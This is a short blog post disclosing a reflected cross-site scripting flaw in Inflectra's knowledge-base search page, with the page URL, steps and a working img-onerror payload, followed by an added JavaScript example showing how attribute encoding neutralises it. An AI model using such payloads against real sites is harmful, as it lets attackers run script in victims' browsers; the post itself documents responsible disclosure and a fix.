Sunday 4 October 2015

Inflectra Security Hall of Fame

Vulnerability: Reflected Cross-Site Scripting (XSS)
Vuln URL: http://www.inflectra.com/Support/KnowledgeBase/List.aspx

Steps:

1. Browse to the URL -> http://www.inflectra.com/Support/KnowledgeBase/List.aspx

2. Enter the following payload in the search box

"><img src=: '"><img src=a onerror=prompt(document.domain);>
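
Why the payload in step 2 works, and the output encoding that stops it, shown as an added example that is not part of the original post or Inflectra's code. It assumes the search term is echoed into a double-quoted value attribute; the markup and all function names are hypothetical.

```javascript
// Added example. The markup and function names are hypothetical, not Inflectra's code.

// Payload string from step 2 of the report, treated here as plain data.
const PAYLOAD = `"><img src=: '"><img src=a onerror=prompt(document.domain);>`;

// Before: the term is concatenated raw into a double-quoted attribute.
function renderSearchBoxUnsafe(term) {
  return `<input type="text" name="q" value="${term}">`;
}

// Encode the characters that can close an attribute value or open a tag.
// "&" is encoded too, so a term like "&lt;" is shown literally, not as "<".
function encodeHtmlAttr(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// After: same markup, with the term encoded for the attribute context.
function renderSearchBoxSafe(term) {
  return `<input type="text" name="q" value="${encodeHtmlAttr(term)}">`;
}

// Review helper: count raw tag openers ("<" followed by a letter) in the output.
// The template contributes exactly one (<input>); anything more came from the term.
function countTagOpeners(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// What the browser places in the field after decoding the attribute value.
function decodeHtmlAttr(s) {
  const map = { "&amp;": "&", "&lt;": "<", "&gt;": ">", "&quot;": '"', "&#39;": "'" };
  return s.replace(/&(?:amp|lt|gt|quot|#39);/g, (e) => map[e]);
}

console.log(renderSearchBoxUnsafe(PAYLOAD)); // attribute closed early, two <img> tags follow
console.log(renderSearchBoxSafe(PAYLOAD));   // one <input> whose value is inert text
```

The leading "> of the payload is what ends the attribute and the tag in the unencoded version; once encoded, the same characters stay inside the value and the search box still displays the text the user typed.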

The Inflectra team acknowledged me for disclosing security issues to them.
Check here -> https://www.inflectra.com/company/responsible-disclosure.aspx